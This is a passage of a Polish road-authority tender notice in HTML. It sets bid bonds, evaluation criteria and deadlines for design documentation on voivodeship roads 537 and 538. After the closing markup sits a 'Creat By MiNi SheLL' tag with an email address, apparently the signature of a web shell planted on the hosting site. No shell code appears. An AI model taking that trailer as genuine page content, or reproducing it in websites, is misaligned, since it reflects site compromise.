2. Wadium w pieniądzu Wykonawca jest zobowiązany do wniesienia odrębnie dla każdej części w określonej w niniejszym rozdziale wysokości i na wskazany w pkt. 9.3 SIWZ rachunek:
1)	dla części nr 1  wadium w wysokości: 650,00 PLN (słownie: sześćset pięćdziesiąt 00/100); 
2)	dla części nr 2  wadium w wysokości: 2.400,00 PLN (słownie: dwa tysiące czterysta złotych 00/100); 
3)	dla części nr 3  wadium w wysokości: 350,00 PLN (słownie: trzysta pięćdziesiąt 00/100); 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin skrócenia wykonania (Etap III)</td><td>36</td></tr><tr><td>okres gwarancji</td><td>4</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Istotne zmiany umowy oraz warunki wprowadzania zmian określa wzór umowy (załącznik nr 6 do SIWZ, udostępniony przez Zamawiającego na stronie internetowej www.zdw.olsztyn.pl.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>1.	Rozbudowa drogi wojewódzkiej nr 538 w zakresie budowy ciągu pieszo-rowerowego w Biskupcu;<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Opracowanie dokumentacji projektowej dla zadania: Rozbudowa drogi wojewódzkiej nr 538 w zakresie budowy ciągu pieszo-rowerowego w Biskupcu
- zakres opracowania  budowa ciągu pieszo  rowerowego po stronie prawej drogi wojewódzkiej nr 538 od drogi powiatowej nr 1293N (osiedle podleśne) do stacji benzynowej w miejscowości Biskupiec; łączna długość około 0,8 km;
- droga rowerowa winna zapewniać prawidłowy wjazd (początek ścieżki  osiedle podleśne) i wyjazd (koniec ścieżki  przy stacji benzynowej);
- wykonanie inwentaryzacji stanu istniejącego urządzeń i instalacji znajdujących się w obrębie przewidywanej lokalizacji mających wpływ na realizację przedmiotu zamówienia;
- wszelkie napotkane podczas wizji lokalnej obiekty inżynierskie, niespełniające wymagań technicznych dla drogi klasy G, należy dostosować do wymogów technicznych;
- przebudowa kolizji z urządzeniami obcymi;
- wykonanie odwodnienia w obrębie wykonywanych prac (w tym wykonanie przepustów)
- w przypadku wystąpienia kolizji z drzewami, wycinka drzew i krzewów kolidujących z przebudową drogi;
- przebudowa zjazdów;
- wykonanie przejścia dla pieszych i połączenie ciągu z istniejącym chodnikiem przy stacji benzynowej.
2.Wymagania dla projektowanych obiektów
1)Obiekty budowlane i urządzenia należy projektować zgodnie z:
a) przepisami, w tym techniczno-budowlanymi,
b) zasadami wiedzy technicznej.
Gdziekolwiek w opisie przedmiotu zamówienia przywołane są konkretne przepisy, normy, wytyczne i katalogi, które spełniać mają opracowania projektowe, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych przepisów, norm, wytycznych i katalogów.
2)Obiekty budowlane i urządzenia należy projektować tak, aby zapewnić optymalną ekonomiczność budowy i eksploatacji, bezpieczeństwo ruchu drogowego.
3)Obiekty budowlane i urządzenia należy projektować z zastosowaniem nowoczesnych konstrukcji, materiałów i technologii robót.
4)Obiekty budowlane i urządzenia należy projektować z zapewnieniem wymagań ustawy 
o odpadach.
3. Materiały do wykonania obiektów budowlanych i urządzeń
Wykonawca zaprojektuje w opracowaniach projektowych zastosowanie takich nowoczesnych materiałów do wykonania obiektów budowlanych i urządzeń, które spełniają wymagania obowiązujących przepisów oraz są zgodne z wymaganiami norm i z zasadami wiedzy technicznej.
Szczegółowy opis przedmiotu zamówienia dla części nr 1 zawarty jest w załączniku nr 1 do SIWZ (Szczegółowy opis przedmiotu zamówienia). <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 15<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin skrcenia wykonania (Etap III)</td><td>36</td></tr><tr><td>okres gwarancji</td><td>4</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: 
15 m-cy od dnia podpisania umowy, z podziałem na etapy: 
- ETAP I  wykonanie koncepcji i jej zatwierdzenie przez Zamawiającego  w ciągu 4 m-cy od daty podpisania umowy;
- ETAP II  wykonanie i dostarczenie kompletnej dokumentacji projektowej  w ciągu 8 m-cy od dnia podpisania umowy;
- ETAP III  uzyskanie zaświadczenia o przyjęciu do wiadomości zgłoszonych robót/ostatecznego pozwolenia na budowę/ostatecznej decyzji ZRID  w ciągu 15 m-cy od daty podpisania umowy.
Etap III może zostać skrócony o 1, 2 lub 3 m-ce (kryterium termin wykonania).
UWAGA:
Termin wykonania zamówienia może ulec zmianie w zależności od zaproponowanego                w ofercie Wykonawcy terminu skrócenia wykonania zamówienia w ramach pozacenowego kryterium oceny ofert. Skrócenie terminu wykonania w ramach kryterium oceny ofert dotyczy Etapu III.
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>2.	Przebudowa drogi wojewódzkiej nr 538 na odcinku Biskupiec - Bielice w zakresie wzmocnienia nawierzchni;<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Opracowanie dokumentacji projektowej dla zadania: Przebudowa drogi wojewódzkiej nr 538 na odcinku Biskupiec - Bielice w zakresie wzmocnienia nawierzchni
- klasa drogi  G;
- kategoria ruchu  KR2;
- zakres opracowania  od mostu na rzece Osa w Biskupcu do przejazdu kolejowego w Bielicach;
- zaprojektowanie do parametrów zgodnych z obowiązującymi warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie;
- wykonanie nakładki z miejscowymi wzmocnieniami zapadlisk i uszkodzeń krawędziowych;
- wykonanie inwentaryzacji stanu istniejącego urządzeń i instalacji znajdujących się w obrębie przewidywanej lokalizacji mających wpływ na realizację przedmiotu zamówienia;
- wszelkie ujawnione podczas wizji lokalnej obiekty inżynierskie, niespełniające wymagań technicznych dla drogi klasy G, należy dostosować do wymogów technicznych
- przebudowa kolizji z urządzeniami obcymi;
- wykonanie odwodnienia drogi;
- w przypadku wystąpienia kolizji z drzewami, wycinka drzew i krzewów kolidujących z przebudową drogi;
- przebudowa istniejących zjazdów.
2.Wymagania dla projektowanych obiektów
1)Obiekty budowlane i urządzenia należy projektować zgodnie z:
a) przepisami, w tym techniczno-budowlanymi,
b) zasadami wiedzy technicznej.
Gdziekolwiek w opisie przedmiotu zamówienia przywołane są konkretne przepisy, normy, wytyczne i katalogi, które spełniać mają opracowania projektowe, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych przepisów, norm, wytycznych i katalogów.
2)Obiekty budowlane i urządzenia należy projektować tak, aby zapewnić optymalną ekonomiczność budowy i eksploatacji, bezpieczeństwo ruchu drogowego.
3)Obiekty budowlane i urządzenia należy projektować z zastosowaniem nowoczesnych konstrukcji, materiałów i technologii robót.
4)Obiekty budowlane i urządzenia należy projektować z zapewnieniem wymagań ustawy 
o odpadach.
3. Materiały do wykonania obiektów budowlanych i urządzeń
Wykonawca zaprojektuje w opracowaniach projektowych zastosowanie takich nowoczesnych materiałów do wykonania obiektów budowlanych i urządzeń, które spełniają wymagania obowiązujących przepisów oraz są zgodne z wymaganiami norm i z zasadami wiedzy technicznej.
Szczegółowy opis przedmiotu zamówienia dla części nr 2 zawarty jest w załączniku nr 1 do SIWZ (Szczegółowy opis przedmiotu zamówienia).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 15<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin krócenia wykonania (Etap III)</td><td>36</td></tr><tr><td>okres gwarancji</td><td>4</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: 
15 m-cy od dnia podpisania umowy, z podziałem na etapy: 
- ETAP I  wykonanie koncepcji i jej zatwierdzenie przez Zamawiającego  w ciągu 4 m-cy od daty podpisania umowy;
- ETAP II  wykonanie i dostarczenie kompletnej dokumentacji projektowej  w ciągu 8 m-cy od dnia podpisania umowy;
- ETAP III  uzyskanie zaświadczenia o przyjęciu do wiadomości zgłoszonych robót/ostatecznego pozwolenia na budowę/ostatecznej decyzji ZRID  w ciągu 15 m-cy od daty podpisania umowy.
Etap III może zostać skrócony o 1, 2 lub 3 m-ce (kryterium termin wykonania).
UWAGA:
Termin wykonania zamówienia może ulec zmianie w zależności od zaproponowanego                w ofercie Wykonawcy terminu skrócenia wykonania zamówienia w ramach pozacenowego kryterium oceny ofert. Skrócenie terminu wykonania w ramach kryterium oceny ofert dotyczy Etapu III.
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>3.	Rozbudowa drogi wojewódzkiej nr 537 w miejscowości Fijewo w zakresie budowy ciągu pieszo-rowerowego.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Opracowanie dokumentacji projektowej dla zadania: Rozbudowa drogi wojewódzkiej nr 537 w miejscowości Fijewo w zakresie budowy ciągu pieszo-rowerowego
- zakres opracowania  budowa ciągu pieszo  rowerowego po stronie lewej drogi wojewódzkiej nr 537 od istniejącego ciągu (rondo przy ul. 19 Stycznia w Lubawie) do chodnika przy Urzędzie Gminy Lubawa (ul. 19 Stycznia); łączna długość około 0,4 km;
- droga rowerowa winna zapewniać prawidłowy wjazd (początek ścieżki) i wyjazd (koniec ścieżki) z drogi wojewódzkiej;
- wykonanie inwentaryzacji stanu istniejącego urządzeń i instalacji znajdujących się w obrębie przewidywanej lokalizacji mających wpływ na realizację przedmiotu zamówienia;
- wszelkie ujawnione podczas wizji lokalnej obiekty inżynierskie, niespełniające wymagań technicznych dla drogi klasy G, należy dostosować do wymogów technicznych;
- przebudowa kolizji z urządzeniami obcymi;
- wykonanie odwodnienia w obrębie wykonywanych prac (w tym wykonanie przepustów);
- w przypadku wystąpienia kolizji z drzewami, wycinka drzew i krzewów kolidujących z przebudową drogi;
- przebudowa zjazdów.
2.Wymagania dla projektowanych obiektów
1)Obiekty budowlane i urządzenia należy projektować zgodnie z:
a) przepisami, w tym techniczno-budowlanymi,
b) zasadami wiedzy technicznej.
Gdziekolwiek w opisie przedmiotu zamówienia przywołane są konkretne przepisy, normy, wytyczne i katalogi, które spełniać mają opracowania projektowe, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych przepisów, norm, wytycznych i katalogów.
2)Obiekty budowlane i urządzenia należy projektować tak, aby zapewnić optymalną ekonomiczność budowy i eksploatacji, bezpieczeństwo ruchu drogowego.
3)Obiekty budowlane i urządzenia należy projektować z zastosowaniem nowoczesnych konstrukcji, materiałów i technologii robót.
4)Obiekty budowlane i urządzenia należy projektować z zapewnieniem wymagań ustawy 
o odpadach.
3. Materiały do wykonania obiektów budowlanych i urządzeń
Wykonawca zaprojektuje w opracowaniach projektowych zastosowanie takich nowoczesnych materiałów do wykonania obiektów budowlanych i urządzeń, które spełniają wymagania obowiązujących przepisów oraz są zgodne z wymaganiami norm i z zasadami wiedzy technicznej.
Szczegółowy opis przedmiotu zamówienia dla części nr 3 zawarty jest w załączniku nr 1 do SIWZ (Szczegółowy opis przedmiotu zamówienia). <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 15<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin skrócenia wykonania</td><td>36</td></tr><tr><td>okres gwarancji</td><td>4</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: 
15 m-cy od dnia podpisania umowy, z podziałem na etapy: 
- ETAP I  wykonanie koncepcji i jej zatwierdzenie przez Zamawiającego  w ciągu 4 m-cy od daty podpisania umowy;
- ETAP II  wykonanie i dostarczenie kompletnej dokumentacji projektowej  w ciągu 8 m-cy od dnia podpisania umowy;
- ETAP III  uzyskanie zaświadczenia o przyjęciu do wiadomości zgłoszonych robót/ostatecznego pozwolenia na budowę/ostatecznej decyzji ZRID  w ciągu 15 m-cy od daty podpisania umowy.
Etap III może zostać skrócony o 1, 2 lub 3 m-ce (kryterium termin wykonania).
UWAGA:
Termin wykonania zamówienia może ulec zmianie w zależności od zaproponowanego                w ofercie Wykonawcy terminu skrócenia wykonania zamówienia w ramach pozacenowego kryterium oceny ofert. Skrócenie terminu wykonania w ramach kryterium oceny ofert dotyczy Etapu III.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com